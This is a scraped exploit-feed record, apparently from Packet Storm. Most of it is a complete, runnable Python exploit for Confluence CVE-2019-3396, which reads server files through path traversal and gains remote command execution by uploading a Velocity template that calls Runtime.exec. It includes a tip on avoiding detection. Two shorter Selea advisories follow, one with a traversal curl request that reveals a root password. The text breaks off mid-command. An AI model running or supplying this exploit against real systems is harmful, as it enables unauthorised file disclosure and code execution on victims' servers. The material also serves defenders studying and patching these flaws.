Exploit Title: Atlassian Confluence Widget Connector Macro - SSTI \n# Date: 21-Jan-2021 \n# Exploit Author: 46o60 \n# Vendor Homepage: https://www.atlassian.com/software/confluence \n# Software Link: https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin \n# Version: 6.12.1 \n# Tested on: Ubuntu 20.04.1 LTS \n# CVE : CVE-2019-3396 \n \n#!/usr/bin/env python3 \n# -*- coding: UTF-8 -*- \n\"\"\" \n \nExploit for CVE-2019-3396 (https://www.cvedetails.com/cve/CVE-2019-3396/) Widget Connector macro in Atlassian \nConfluence Server server-side template injection. \n \nVulnerability information: \nAuthors: \nDaniil Dmitriev - Discovering vulnerability \nDmitry (rrock) Shchannikov - Metasploit module \nExploit \nExploitDB: \nhttps://www.exploit-db.com/exploits/46731 \nMetasploit \nhttps://www.rapid7.com/db/modules/exploit/multi/http/confluence_widget_connector/ \nexploit/multi/http/confluence_widget_connector \n \nWhile Metasploit module works perfectly fine it has a limitation that to gain RCE outbound FTP request is being made \nfrom the target Confluence server towards attacker's server where the Velocity template with the payload is being \nhosted. If this is not possible, for example, because network where the target Confluence server is located filters all \noutbound traffic, alternative approach is needed. This exploit, in addition to original exploit implements this \nalternative approach by first uploading the template to the server and then loading it with original vulnerability from \nlocal file system. The limitation is that to upload a file, a valid session is needed for a non-privileged user. Any \nuser can upload a file to the server by attaching the file to his \"personal space\". \n \nThere are two modes of the exploit: \n1. Exploiting path traversal for file disclosure and directory listings. \n2. RCE by uploading a template file with payload to the server. \n \nIn case where network is filtered and loading remote template is not possible and also you do not have a low-privileged \nuser session, you can still exploit the '_template' parameter to browse the server file system by using the first mode \nof this exploit. Conveniently, application returns file content as well as directory listing depending on to what path \nis pointing to. As in original exploit no authentication is needed for this mode. \n \nLimitations of path traversal exploit: \n- not possible to distinguish between non-existent path and lack of permissions \n- no distinction between files and directories in the output \n \nIf you have ability to authenticate to the server and have enough privileges to upload files use the second mode. A \nregular user probably has enough privileges for this since each user can have their own personal space where they \nshould be able to add attachments. This exploit automatically finds the personal space, or creates one if it does not \nexists, a file with Velocity template payload. It then uses the original vulnerability but loads the template file \nwith payload from local filesystem instead from remote system. \n \nPrerequisite of RCE in this exploit: \n- authenticated session is needed \n- knowledge of where attached files are stored on the file system - if it is not default location then use first mode \nto find it, should be in Confluence install directory under ./attachments subdirectory \n \nUsage \n- list /etc folder on Confluence server hosted on http://confluence.example.com \npython exploit.py -th confluence.example.com fs /etc \n- get content of /etc/passwd on same server but through a proxy \npython exploit.py -th confluence.example.com -px http://127.0.0.1:8080 fs /etc/passwd \n- execute 'whoami' command on the same server (this will upload a template file with payload to the server using \nexisting session) \npython exploit.py -th confluence.example.com rce -c JSESSIONID=ABCDEF123456789ABCDEF123456789AB \"whoami\" \n \nTested on Confluence versions: \n6.12.1 \n \nTo test the exploit: \n1. Download Confluence trial version for version 6.12.1 \nhttps://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin \n(to find this URL go to download page for the latest version, pick LTS release Linux 64 Bit, turn on the browser \nnetwork tools to capture HTTP traffic, click Submit, take the URL from request towards 'product-downloads' and \nchange the version in URL to be 6.12.1) \nSHA256: 679b1c05cf585b92af9888099c4a312edb2c4f9f4399cf1c1b716b03c114e9e6 atlassian-confluence-6.12.1-x64.bin \n2. Run the binary to install it, for example on Ubuntu 20.04. Use \"Express Install\" and everything by default. \nchmod +x atlassian-confluence-6.12.1-x64.bin \nsudo ./atlassian-confluence-6.12.1-x64.bin \n3. Open the browser to configure initial installation, when you get to license window copy the server ID. \n4. Create account at https://my.atlassian.com/ and request for new trial license using server ID. \n5. Activate the license and finish the installation with default options. \n6. Create a user and login with him to go through initial user setup and get the session id for RCE part of the \nexploit. \n7. Run the exploit (see usage above). \n\"\"\" \n \n__version__ = \"1.0.0\" \n__author__ = \"46o60\" \n \nimport argparse \nimport logging \nimport requests \nimport urllib3 \nfrom bs4 import BeautifulSoup \nimport re \nimport json \nimport random \nimport string \n \n# script and banner \nSCRIPT_NAME = \"CVE-2019-3396: Confluence exploit script\" \nASCII_BANNER_TEXT = \"\"\"____ ____ _ _ ____ _ _ _ ____ _ _ ____ ____ ____ \n| | | |\\ | |___ | | | |___ |\\ | | | | |__/ \n|___ |__| | \\| | |___ |__| |___ | \\| |___ |__| | \\ \n \n\"\"\" \n \n# turn off requests log output \nurllib3.disable_warnings() \nlogging.getLogger(\"urllib3\").setLevel(logging.WARNING) \n \n \ndef print_banner(): \n\"\"\" \nPrints script ASCII banner and basic information. \n \nBecause it is cool. \n\"\"\" \nprint(ASCII_BANNER_TEXT) \nprint(\"{} v{}\".format(SCRIPT_NAME, __version__)) \nprint(\"Author: {}\".format(__author__)) \nprint() \n \n \ndef exit_log(logger, message): \n\"\"\" \nUtility function to log exit message and finish the script. \n\"\"\" \nlogger.error(message) \nexit(1) \n \n \ndef check_cookie_format(value): \n\"\"\" \nChecks if value is in format: ^[^=]+=[^=]+$ \n\"\"\" \npattern = r\"^[^=]+=[^=]+$\" \nif not re.match(pattern, value): \nraise argparse.ArgumentTypeError(\"provided cookie string does not have correct format\") \nreturn value \n \n \ndef parse_arguments(): \n\"\"\" \nPerforms parsing of script arguments. \n\"\"\" \n# creating parser \nparser = argparse.ArgumentParser( \nprog=SCRIPT_NAME, \ndescription=\"Exploit CVE-2019-3396 to explore file system or gain RCE through file upload.\" \n) \n \n# general script arguments \nparser.add_argument( \n\"-V\", \"--version\", \nhelp=\"displays the current version of the script\", \naction=\"version\", \nversion=\"{name} {version}\".format(name=SCRIPT_NAME, version=__version__) \n) \nparser.add_argument( \n\"-v\", \"--verbosity\", \nhelp=\"increase output verbosity, two possible levels, no verbosity with default log output and debug verbosity\", \naction=\"count\", \ndefault=0 \n) \nparser.add_argument( \n\"-sb\", \"--skip-banner\", \nhelp=\"skips printing of the banner\", \naction=\"store_true\", \ndefault=False \n) \nparser.add_argument( \n\"-s\", \"--silent\", \nhelp=\"do not output results of the exploit to standard output\", \naction=\"store_true\", \ndefault=False \n) \nparser.add_argument( \n\"-q\", \"--quiet\", \nhelp=\"do not output any logs\", \naction=\"store_true\", \ndefault=False \n) \n \n# arguments for input \nparser.add_argument( \n\"-px\", \"--proxy\", \nhelp=\"proxy that should be used for the request, the same proxy will be used for HTTP and HTTPS\" \n) \nparser.add_argument( \n\"-t\", \"--tls\", \nhelp=\"use HTTPS protocol, default behaviour is to use plain HTTP\", \naction=\"store_true\" \n) \nparser.add_argument( \n\"-th\", \"--target-host\", \nhelp=\"target hostname/domain\", \nrequired=True \n) \nparser.add_argument( \n\"-p\", \"--port\", \nhelp=\"port where the target is listening, default ports 80 for HTTP and 443 for HTTPS\" \n) \n \n# two different sub commands \nsubparsers = parser.add_subparsers( \ntitle=\"actions\", \ndescription=\"different behaviours of the script\", \nhelp=\"for detail description of available action options invoke -h for each individual action\", \ndest=\"action\" \n) \n \n# only exploring file system by disclosure of files and directories \nparser_file_system = subparsers.add_parser( \n\"fs\", \nhelp=\"use the exploit to browse local file system on the target endpoint\" \n) \nparser_file_system.add_argument( \n\"path\", \nhelp=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\" \n) \nparser_file_system.set_defaults(func=exploit_path_traversal) \n \n# using file upload to deploy payload and achieve RCE \nparser_rce = subparsers.add_parser( \n\"rce\", \nhelp=\"use the exploit to upload a template \" \n) \nparser_rce.add_argument( \n\"-hd\", \"--home-directory\", \nhelp=\"Confluence home directory on the server\" \n) \nparser_rce.add_argument( \n\"-c\", \"--cookie\", \nhelp=\"cookie that should be used for the session, value passed as it is in HTTP request, for example: \" \n\"-c JSESSIONID=ABCDEF123456789ABCDEF123456789AB\", \ntype=check_cookie_format, \nrequired=True \n) \nparser_rce.add_argument( \n\"command\", \nhelp=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\" \n) \nparser_rce.set_defaults(func=exploit_rce) \n \n# parsing \narguments = parser.parse_args() \n \nreturn arguments \n \n \nclass Configuration: \n\"\"\" \nRepresents all supported configuration items. \n\"\"\" \n \n# Parse arguments and set all configuration variables \ndef __init__(self, script_args): \nself.script_arguments = script_args \n \n# setting input arguments \nself._proxy = self.script_arguments.proxy \nself._target_protocol = \"https\" if self.script_arguments.tls else \"http\" \nself._target_host = self.script_arguments.target_host \nself._target_port = self.script_arguments.port if self.script_arguments.port else \\ \n443 if self.script_arguments.tls else 80 \n \n@staticmethod \ndef get_logger(verbosity): \n\"\"\" \nPrepares logger to output to stdout with appropriate verbosity. \n\"\"\" \nlogger = logging.getLogger() \n# default logging level \nlogger.setLevel(logging.DEBUG) \n \n# Definition of logging to console \nch = logging.StreamHandler() \n# specific logging level for console \nif verbosity == 0: \nch.setLevel(logging.INFO) \nelif verbosity > 0: \nch.setLevel(logging.DEBUG) \n \n# formatting \nclass MyFormatter(logging.Formatter): \n \ndefault_fmt = logging.Formatter('[?] %(message)s') \ninfo_fmt = logging.Formatter('[+] %(message)s') \nerror_fmt = logging.Formatter('[-] %(message)s') \nwarning_fmt = logging.Formatter('[!] %(message)s') \ndebug_fmt = logging.Formatter('>>> %(message)s') \n \ndef format(self, record): \nif record.levelno == logging.INFO: \nreturn self.info_fmt.format(record) \nelif record.levelno == logging.ERROR: \nreturn self.error_fmt.format(record) \nelif record.levelno == logging.WARNING: \nreturn self.warning_fmt.format(record) \nelif record.levelno == logging.DEBUG: \nreturn self.debug_fmt.format(record) \nelse: \nreturn self.default_fmt.format(record) \n \nch.setFormatter(MyFormatter()) \n \n# adding handler \nlogger.addHandler(ch) \n \nreturn logger \n \n# Properties \n@property \ndef endpoint(self): \nif not self._target_protocol or not self._target_host or not self._target_port: \nexit_log(log, \"failed to generate endpoint URL\") \nreturn f\"{self._target_protocol}://{self._target_host}:{self._target_port}\" \n \n@property \ndef remote_path(self): \nreturn self.script_arguments.path \n \n@property \ndef attachment_dir(self): \nhome_dir = self.script_arguments.home_directory if self.script_arguments.home_directory else \\ \nExploit.DEFAULT_CONFLUENCE_INSTALL_DIR \nreturn f\"{home_dir}{Exploit.DEFAULT_CONFLUENCE_ATTACHMENT_PATH}\" \n \n@property \ndef rce_command(self): \nreturn self.script_arguments.command \n \n@property \ndef session_cookie(self): \nif not self.script_arguments.cookie: \nreturn None \nparts = self.script_arguments.cookie.split(\"=\") \nreturn { \nparts[0]: parts[1] \n} \n \n@property \ndef proxies(self): \nreturn { \n\"http\": self._proxy, \n\"https\": self._proxy \n} \n \n \nclass Exploit: \n\"\"\" \nThis class represents actual exploit towards the target Confluence server. \n\"\"\" \n# used for both path traversal and RCE \nDEFAULT_VULNERABLE_ENDPOINT = \"/rest/tinymce/1/macro/preview\" \n \n# used only for RCE \nCREATE_PERSONAL_SPACE_PATH = \"/rest/create-dialog/1.0/space-blueprint/create-personal-space\" \nPERSONAL_SPACE_KEY_PATH = \"/index.action\" \nPERSONAL_SPACE_KEY_REGEX = r\"^/spaces/viewspace\\.action\\?key=(.*?)$\" \nPERSONAL_SPACE_ID_PATH = \"/rest/api/space\" \nPERSONAL_SPACE_KEY_PARAMETER_NAME = \"spaceKey\" \nHOMEPAGE_REGEX = r\"/rest/api/content/([0-9]+)$\" \nATL_TOKEN_PATH = \"/pages/viewpageattachments.action\" \nFILE_UPLOAD_PATH = \"/pages/doattachfile.action\" \n# file name has no real significance, file is identified on file system by it's ID \n# (change only if you want to avoid detection) \nDEFAULT_UPLOADED_FILE_NAME = \"payload_{}.vm\".format( \n''.join(random.choice(string.ascii_lowercase) for i in range(5)) \n) # the extension .vm is not really needed, remove it if you have problems uploading the template \nDEFAULT_CONFLUENCE_INSTALL_DIR = \"/var/atlassian/application-data/confluence\" \nDEFAULT_CONFLUENCE_ATTACHMENT_PATH = \"/attachments/ver003\" \n# using random name for uploaded file so it will always be first version of the file \nDEFAULT_FILE_VERSION = \"1\" \n \ndef __init__(self, config): \n\"\"\" \nRuns the exploit towards target_url. \n\"\"\" \nself._config = config \n \nself._target_url = f\"{self._config.endpoint}{Exploit.DEFAULT_VULNERABLE_ENDPOINT}\" \n \nif self._config.script_arguments.action == \"rce\": \nself._root_url = f\"{self._config.endpoint}/\" \nself._create_personal_space_url = f\"{self._config.endpoint}{Exploit.CREATE_PERSONAL_SPACE_PATH}\" \nself._personal_space_key_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_KEY_PATH}\" \n \n# Following data will be dynamically created while exploit is running \nself._space_key = None \nself._personal_space_id_url = None \nself._space_id = None \nself._homepage_id = None \nself._atl_token_url = None \nself._atl_token = None \nself._upload_url = None \nself._file_id = None \n \ndef generate_payload_location(self): \n\"\"\" \nGenerates location on file system for uploaded attachment based on Confluence Ver003 scheme. \n \nSee more here: https://confluence.atlassian.com/doc/hierarchical-file-system-attachment-storage-704578486.html \n\"\"\" \nif not self._space_id or not self._homepage_id or not self._file_id: \nexit_log(log, \"cannot generate payload location without space, homepage and file ID\") \n \nspace_folder_one = str(int(self._space_id[-3:]) % 250) \nspace_folder_two = str(int(self._space_id[-6:-3]) % 250) \nspace_folder_three = self._space_id \npage_folder_one = str(int(self._homepage_id[-3:]) % 250) \npage_folder_two = str(int(self._homepage_id[-6:-3]) % 250) \npage_folder_three = self._homepage_id \nfile_folder = self._file_id \nversion = Exploit.DEFAULT_FILE_VERSION \n \npayload_location = f\"{self._config.attachment_dir}/\" \\ \nf\"{space_folder_one}/{space_folder_two}/{space_folder_three}/\"\\ \nf\"{page_folder_one}/{page_folder_two}/{page_folder_three}/\" \\ \nf\"{file_folder}/{version}\" \nlog.debug(f\"generated payload location: {payload_location}\") \n \nreturn payload_location \n \ndef path_traversal(self, target_remote_path, decode_output=False): \n\"\"\" \nUses vulnerability in _template parameter to achieve path traversal. \n \nArgs: \ntarget_remote_path (string): path on local file system of the target application \ndecode_output (bool): set to True if output of the file will be character codes separated by new lines, \nused with RCE \n\"\"\" \npost_data = { \n\"contentId\": str(random.randint(1, 10000)), \n\"macro\": { \n\"body\": \"\", \n\"name\": \"widget\", \n\"params\": { \n\"_template\": f\"file://{target_remote_path}\", \n\"url\": \"https://www.youtube.com/watch?v=\" + ''.join(random.choice( \nstring.ascii_lowercase + string.ascii_uppercase + string.digits) for i in range(11)) \n} \n} \n} \n \nlog.info(\"sending request towards vulnerable endpoint with payload in '_template' parameter\") \nresponse = requests.post( \nself._target_url, \nheaders={ \n\"Content-Type\": \"application/json; charset=utf-8\" \n}, \njson=post_data, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"exploit failed\") \n \npage_content = response.content \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \n# if div element with class widget-error is returned, that means the exploit worked but it failed to retrieve \n# the requested path \nerror_element = soup.find_all(\"div\", \"widget-error\") \nif error_element: \nlog.warning(\"failed to retrieve target path on the system\") \nlog.warning(\"target path does not exist or application does not have appropriate permissions to view it\") \nreturn \"\" \nelse: \n# otherwise parse out the actual response (file content or directory listing) \noutput_element = soup.find_all(\"div\", \"wiki-content\") \n \nif not output_element: \nexit_log(log, \"application did not return appropriate HTML element\") \nif not len(output_element) == 1: \nlog.warning(\"application unexpectedly returned multiple HTML elements, using the first one\") \noutput_element = output_element[0] \n \nlog.debug(\"extracting HTML element value and stripping the leading and trailing spaces\") \n# output = output_element.string.strip() \noutput = output_element.decode_contents().strip() \n \nif \"The macro 'widget' is unknown. It may have been removed from the system.\" in output: \nexit_log(log, \"widget seems to be disabled on system, target most likely is not vulnerable\") \n \nif not self._config.script_arguments.silent: \nif decode_output: \nparsed_output = \"\" \np = re.compile(r\"^([0-9]+)\") \nfor line in output.split(\"\\n\"): \nr = p.match(line) \nif r: \nparsed_output += chr(int(r.group(1))) \nprint(parsed_output.strip()) \nelse: \nprint(output) \n \nreturn output \n \ndef find_personal_space_key(self): \n\"\"\" \nMakes request that will return personal space key in the response. \n\"\"\" \nlog.debug(\"checking if user has personal space\") \nresponse = requests.get( \nself._root_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \n) \npage_content = response.text \nif \"Add personal space\" in page_content: \nlog.info(f\"user does not have personal space, creating it now...\") \n \nresponse = requests.post( \nself._create_personal_space_url, \nheaders={ \n\"Content-Type\": \"application/json\" \n}, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \njson={ \n\"spaceUserKey\": \"\" \n} \n) \n \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to create personal space\") \n \nlog.debug(f\"personal space created\") \nresponse_data = response.json() \nself._space_key = response_data.get(\"key\") \nelse: \nlog.info(\"sending request to find personal space key\") \nresponse = requests.get( \nself._personal_space_key_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to get personal space key\") \n \npage_content = response.content \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \npersonal_space_link_element = soup.find(\"a\", id=\"view-personal-space-link\") \nif not personal_space_link_element or not personal_space_link_element.has_attr(\"href\"): \nexit_log(log, \"failed to find personal space link in the response, does the user have personal space?\") \npath = personal_space_link_element[\"href\"] \np = re.compile(Exploit.PERSONAL_SPACE_KEY_REGEX) \nr = p.match(path) \nif r: \nself._space_key = r.group(1) \nelse: \nexit_log(log, \"failed to find personal space key\") \n \nlog.debug(f\"personal space key: {self._space_key}\") \nself._personal_space_id_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_ID_PATH}?\" \\ \nf\"{Exploit.PERSONAL_SPACE_KEY_PARAMETER_NAME}={self._space_key}\" \nlog.debug(f\"generated personal space id url: {self._personal_space_id_url}\") \n \ndef find_personal_space_id_and_homepage_id(self): \n\"\"\" \nMakes request that will return personal space ID and homepage ID in the response. \n\"\"\" \nif self._personal_space_id_url is None: \nexit_log(log, f\"personal space id url is missing, did you call exploit functions in correct order?\") \n \nlog.info(\"sending request to find personal space ID and homepage\") \nresponse = requests.get( \nself._personal_space_id_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to get personal space key\") \n \npage_content = response.content \n# response is JSON \ndata = json.loads(page_content) \n \nif \"results\" not in data: \nexit_log(log, \"failed to find 'result' section in json output\") \nitems = data[\"results\"] \nif type(items) is not list or len(items) == 0: \nexit_log(log, \"no results for personal space id\") \npersonal_space_data = items[0] \nif \"id\" not in personal_space_data: \nexit_log(log, \"failed to find ID in personal space data\") \nself._space_id = str(personal_space_data[\"id\"]) \nlog.debug(f\"found space id: {self._space_id}\") \nif \"_expandable\" not in personal_space_data: \nexit_log(log, \"failed to find '_expandable' section in personal space data\") \npersonal_space_expandable_data = personal_space_data[\"_expandable\"] \nif \"homepage\" not in personal_space_expandable_data: \nexit_log(log, \"failed to find homepage in personal space expandable data\") \nhomepage_path = personal_space_expandable_data[\"homepage\"] \np = re.compile(Exploit.HOMEPAGE_REGEX) \nr = p.match(homepage_path) \nif r: \nself._homepage_id = r.group(1) \nlog.debug(f\"found homepage id: {self._homepage_id}\") \nself._atl_token_url = f\"{self._config.endpoint}{Exploit.ATL_TOKEN_PATH}?pageId={self._homepage_id}\" \nlog.debug(f\"generated atl token url: {self._atl_token_url}\") \nself._upload_url = f\"{self._config.endpoint}{Exploit.FILE_UPLOAD_PATH}?pageId={self._homepage_id}\" \nlog.debug(f\"generated upload url: {self._upload_url}\") \nelse: \nexit_log(log, \"failed to find homepage id, homepage path has incorrect format\") \n \ndef get_csrf_token(self): \n\"\"\" \nMakes request to get the current CSRF token for the session. \n\"\"\" \nif self._atl_token_url is None: \nexit_log(log, f\"atl token url is missing, did you call exploit functions in correct order?\") \n \nlog.info(\"sending request to find CSRF token\") \nresponse = requests.get( \nself._atl_token_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to get personal space key\") \n \npage_content = response.content \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \natl_token_element = soup.find(\"input\", {\"name\": \"atl_token\"}) \nif not atl_token_element.has_attr(\"value\"): \nexit_log(log, \"failed to find value for atl_token\") \nself._atl_token = atl_token_element[\"value\"] \nlog.debug(f\"found CSRF token: {self._atl_token}\") \n \ndef upload_template(self): \n\"\"\" \nMakes multipart request to upload the template file to the server. \n\"\"\" \nlog.info(\"uploading template to server\") \nif not self._atl_token: \nexit_log(log, \"cannot upload a file without CSRF token\") \nif self._upload_url is None: \nexit_log(log, f\"upload url is missing, did you call exploit functions in correct order?\") \n \n# Velocity template here executes command and then captures the output. Here the output is generated by printing \n# character codes one by one in each line. This can be improved for sure but did not have time to investigate \n# why techniques from James Kettle's awesome research paper 'Server-Side Template Injection:RCE for the modern \n# webapp' was not working properly. This gets decoded on our python client later. \ntemplate = f\"\"\"#set( $test = \"test\" ) \n#set($ex = $test.getClass().forName(\"java.lang.Runtime\").getMethod(\"getRuntime\",null).invoke(null,null).exec(\"{self._config.script_arguments.command}\")) \n#set($exout = $ex.waitFor()) \n#set($out = $ex.getInputStream()) \n#foreach($i in [1..$out.available()]) \n#set($ch = $out.read()) \n$ch \n#end\"\"\" \n \nlog.debug(f\"uploading template payload under name {Exploit.DEFAULT_UPLOADED_FILE_NAME}\") \nparts = { \n\"atl_token\": (None, self._atl_token), \n\"file_0\": (Exploit.DEFAULT_UPLOADED_FILE_NAME, template), \n\"confirm\": \"Attach\" \n} \nresponse = requests.post( \nself._upload_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nfiles=parts \n) \n \n# for successful upload first a 302 response needs to happen then 200 page is returned with file ID \nif response.status_code == 403: \nexit_log(log, \"got 403, probably problem with CSRF token\") \nif not len(response.history) == 1 or not response.history[0].status_code == 302: \nexit_log(log, \"failed to upload the payload\") \n \npage_content = response.content \n \nif \"Upload Failed\" in str(page_content): \nexit_log(log, \"failed to upload template\") \n \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \nfile_link_element = soup.find(\"a\", \"filename\", {\"title\": Exploit.DEFAULT_UPLOADED_FILE_NAME}) \nif not file_link_element.has_attr(\"data-linked-resource-id\"): \nexit_log(log, \"failed to find data-linked-resource-id attribute (file ID) for uploaded file link\") \nself._file_id = file_link_element[\"data-linked-resource-id\"] \nlog.debug(f\"found file ID: {self._file_id}\") \n \n \ndef exploit_path_traversal(config): \n\"\"\" \nThis sends one request towards vulnerable server to either get local file content or directory listing. \n\"\"\" \nlog.debug(\"running path traversal exploit\") \n \nexploit = Exploit(config) \nexploit.path_traversal(config.remote_path) \n \n \ndef exploit_rce(config): \n\"\"\"This executes multiple steps to gain RCE. Requires a session token. \n \nSteps: \n1. find personal space key for the user \n2. find personal space ID and homepage ID for the user \n3. get CSRF token (generated per session) \n4. upload template file with Java code (involves two requests, first one is 302 redirection) \n5. use path traversal part of exploit to load and execute local template file \n6. profit \n\"\"\" \nlog.debug(\"running RCE exploit\") \n \nexploit = Exploit(config) \nexploit.find_personal_space_key() \nexploit.find_personal_space_id_and_homepage_id() \nexploit.get_csrf_token() \nexploit.upload_template() \npayload_location = exploit.generate_payload_location() \nexploit.path_traversal(payload_location, decode_output=True) \n \n \nif __name__ == \"__main__\": \n# parse arguments and load all configuration items \nscript_arguments = parse_arguments() \nlog = Configuration.get_logger(script_arguments.verbosity) \n \nconfiguration = Configuration(script_arguments) \n \n# printing banner \nif not configuration.script_arguments.skip_banner: \nprint_banner() \n \nif script_arguments.quiet: \nlog.disabled = True \n \nlog.debug(\"finished parsing CLI arguments\") \nlog.debug(\"configuration was loaded successfully\") \nlog.debug(\"starting exploit\") \n \n# disabling warning about trusting self sign certificate from python requests \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) \n \n# run appropriate function depending on mode \nconfiguration.script_arguments.func(configuration) \n \nlog.debug(\"done!\") \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/161065/atlassiancwcm-inject.txt"}, {"lastseen": "2021-01-22T15:43:07", "description": "", "published": "2021-01-22T00:00:00", "type": "packetstorm", "title": "Selea CarPlateServer 4.0.1.6 Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-22T00:00:00", "id": "PACKETSTORM:161067", "href": "https://packetstormsecurity.com/files/161067/Selea-CarPlateServer-4.0.1.6-Local-Privilege-Escalation.html", "sourceData": "` \nSelea CarPlateServer (CPS) v4.0.1.6 Local Privilege Escalation \n \n \nVendor: Selea s.r.l. \nProduct web page: https://www.selea.com \nAffected version: 4.0.1.6(210120) \n4.013(201105) \n3.100(200225) \n3.005(191206) \n3.005(191112) \n \nSummary: Our CPS (Car Plate Server) software is an advanced solution that can \nbe installed on computers and servers and used as an operations centre. It can \ncreate sophisticated traffic control and road safety systems connecting to \nstationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert \nnotifications directly to tablets or smartphones, it can receive and transfer \ndata through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution \nthat offers full integration with main video surveillance software. Our CPS \nsoftware connects to the national operations centre and provides law enforcement \nauthorities with necessary tools to issue alerts. CPS is designed to guarantee \ncooperation among different law enforcement agencies. It allows to create a \nmulti-user environment that manages different hierarchy levels and the related \ndivision of competences. \n \nDesc: The application suffers from an unquoted search path issue impacting the \nservice 'Selea CarPlateServer' for Windows deployed as part of Selea CPS software \napplication. This could potentially allow an authorized but non-privileged local \nuser to execute arbitrary code with elevated privileges on the system. A successful \nattempt would require the local user to be able to insert their code in the system \nroot path undetected by the OS or other security applications where it could \npotentially be executed during application startup or reboot. If successful, the \nlocal user's code would execute with the elevated privileges of the application. \n \nTested on: Microsoft Windows 10 Enterprise \nSeleaCPSHttpServer/1.1 \n \n \nVulnerability discovered by Gjoko 'LiquidWorm' Krstic \n@zeroscience \n \n \nAdvisory ID: ZSL-2021-5621 \nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5621.php \n \n \n08.11.2020 \n \n-- \n \n \nC:\\Users\\Smurf>sc qc \"Selea CarPlateServer\" \n[SC] QueryServiceConfig SUCCESS \n \nSERVICE_NAME: Selea CarPlateServer \nTYPE : 110 WIN32_OWN_PROCESS (interactive) \nSTART_TYPE : 2 AUTO_START \nERROR_CONTROL : 1 NORMAL \nBINARY_PATH_NAME : C:/Program Files/Selea/CarPlateServer/CarPlateService.exe \nLOAD_ORDER_GROUP : \nTAG : 0 \nDISPLAY_NAME : Selea CarPlateServer \nDEPENDENCIES : \nSERVICE_START_NAME : LocalSystem \n \nC:\\Users\\Smurf> \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161067/ZSL-2021-5621.txt"}, {"lastseen": "2021-01-22T15:45:26", "description": "", "published": "2021-01-22T00:00:00", "type": "packetstorm", "title": "Selea Targa IP OCR-ANPR Camera Directory Traversal", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-22T00:00:00", "id": "PACKETSTORM:161057", "href": "https://packetstormsecurity.com/files/161057/Selea-Targa-IP-OCR-ANPR-Camera-Directory-Traversal.html", "sourceData": "` \nSelea Targa IP OCR-ANPR Camera Unauthenticated Directory Traversal File Disclosure \n \n \nVendor: Selea s.r.l. \nProduct web page: https://www.selea.com \nAffected version: Model: iZero \nTarga 512 \nTarga 504 \nTarga Semplice \nTarga 704 TKM \nTarga 805 \nTarga 710 INOX \nTarga 750 \nTarga 704 ILB \nFirmware: BLD201113005214 \nBLD201106163745 \nBLD200304170901 \nBLD200304170514 \nBLD200303143345 \nBLD191118145435 \nBLD191021180140 \nBLD191021180140 \nCPS: 4.013(201105) \n3.100(200225) \n3.005(191206) \n3.005(191112) \n \nSummary: IP camera with optical character recognition (OCR) software for automatic \nnumber plate recognition (ANPR) also equipped with ADR system that enables it to read \nthe Hazard Identification Number (HIN, also known as the Kemler Code) and UN number \nof any vehicle captured in free-flow mode. TARGA is fully accurate in reading number \nplates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes \nthis camera suitable for all installation conditions. Its built-in OCR software works \nas an automatic and independent system without the need of a computer, thus giving \nautonomy to the device even in the event of an interruption in the connection between \nthe camera and the operations centre. \n \nDesc: The ANPR camera suffers from an unauthenticated arbitrary file disclosure vulnerability. \nInput passed through the Download Archive in Storage page using get_file.php script is \nnot properly verified before being used to download files. This can be exploited to \ndisclose the contents of arbitrary and sensitive files via directory traversal attacks \nand aid the attacker to disclose clear-text credentials resulting in authentication \nbypass. \n \nTested on: GNU/Linux 3.10.53 (armv7l) \nPHP/5.6.22 \nselea_httpd \nHttpServer/0.1 \nSeleaCPSHttpServer/1.1 \n \n \nVulnerability discovered by Gjoko 'LiquidWorm' Krstic \n@zeroscience \n \n \nAdvisory ID: ZSL-2021-5616 \nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5616.php \n \n \n07.11.2020 \n \n-- \n \n \n$ curl http://192.168.1.17:8080/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json \n{ \n\"viewers\": {}, \n\"root_pwd\": \"P@$$w0rd\", \n\"operators\": {} \n} \n \n$ curl 